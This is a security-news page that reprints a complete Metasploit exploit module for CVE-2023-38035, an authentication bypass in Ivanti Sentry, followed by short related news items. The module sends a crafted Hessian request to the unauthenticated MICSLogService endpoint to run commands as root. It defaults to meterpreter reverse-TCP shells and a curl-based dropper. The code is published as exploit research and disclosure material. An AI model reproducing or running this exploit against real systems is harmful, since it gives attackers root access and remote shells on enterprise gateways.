Security
Headlines
HeadlinesLatestCVEs

Headline

Ivanti Sentry Authentication Bypass / Remote Code Execution

This Metasploit module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which allows for code execution in the context of the root user.

Packet Storm
#web#linux#git#java#rce#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)',        'Description' => %q{          This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which          allows for code execution in the context of the root user.        },        'Author' => [          'Zach Hanley',    # Analysis & PoC          'James Horseman', # Analysis & PoC          'jheysel-r7'      # Msf module        ],        'References' => [          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-38035'],          [ 'URL', 'https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/'],          [ 'CVE', '2023-38035']        ],        'License' => MSF_LICENSE,        'DefaultOptions' => {          'RPORT' => 8443,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/tmp'        },        'Platform' => ['unix', 'linux'],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_X64 ],        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :curl,                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-08-21',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true]),        OptInt.new('SLEEP', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining the module needs to split the multi command payload by semi-colon and send each command individually', 3 ]),      ]    )  end  def check    # Unauthenticated access to the vulnerable endpoint was removed in patched versions of Sentry.    # Send an unsupported GET request and see if it responds politely.    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('The target did not respond to the vulnerable endpoint') unless res    return Exploit::CheckCode::Safe("A vulnerable instance should respond with an HTTP 405 with the string: 'HessianServiceExporter only supports POST requests' in the response body") unless res.code == 405 && res.body.include?('HessianServiceExporter only supports POST requests')    Exploit::CheckCode::Appears  end  def execute_command(cmd, _opts = {})    # Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput`    # which allows for unauthenticated command execution in the context of the root user.    # More info on Hessian: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers    exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00"    exploit_footer = "S\x00\x06isRootTzNz"    # The sink in this RCE is java's Runtime.getRuntime.exec(). So we must prefix our command with 'sh -c $@|sh .echo'    # in order to obtain full shell functionality, more info: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html    cmd = "sh -c $@|sh . echo #{cmd}"    cmd = "sudo #{cmd}" if datastore['USE_SUDO']    vprint_status('Running the command: ' + cmd)    # Prepend the command with the length of the command as per Hessian notation    data = exploit_header + [cmd.length].pack('C') + cmd + exploit_footer    res = send_request_raw(      'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),      'method' => 'POST',      'data' => data    )    fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res    fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Related news

New HardBit Ransomware 4.0 Uses Passphrase Protection to Evade Detection

Cybersecurity researchers have shed light on a new version of a ransomware strain called HardBit that comes packaged with new obfuscation techniques to deter analysis efforts. "Unlike previous versions, HardBit Ransomware group enhanced the version 4.0 with passphrase protection," Cybereason researchers Kotaro Ogino and Koshi Oyama said in an analysis. "The passphrase needs to be provided during

Alert: Ivanti Releases Patch for Critical Vulnerability in Endpoint Manager Solution

Ivanti has released security updates to address a critical flaw impacting its Endpoint Manager (EPM) solution that, if successfully exploited, could result in remote code execution (RCE) on susceptible servers. Tracked as CVE-2023-39336, the vulnerability has been rated 9.6 out of 10 on the CVSS scoring system. The shortcoming impacts EPM 2021 and EPM 2022 prior to SU5. “If exploited, an

Ivanti Sentry critical vulnerability—don't play dice, patch

Categories: Exploits and vulnerabilities Categories: News Tags: Ivanti Tags: Sentry Tags: MobileIron Tags: CVE-2023-38035 Tags: MICS Tags: port 8443 There is some uncertainty about whether a vulnerability in Ivanti Sentry is being exploited in the wild, but why take the risk when you can patch? (Read more...) The post Ivanti Sentry critical vulnerability—don't play dice, patch appeared first on Malwarebytes Labs.

Ivanti Warns of Critical Zero-Day Flaw Being Actively Exploited in Sentry Software

Software services provider Ivanti is warning of a new critical zero-day flaw impacting Ivanti Sentry (formerly MobileIron Sentry) that it said is being actively exploited in the wild, marking an escalation of its security woes. Tracked as CVE-2023-38035 (CVSS score: 9.8), the issue has been described as a case of authentication bypass impacting versions 9.18 and prior due to what it called an

CVE-2023-38035: Ivanti Community

A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution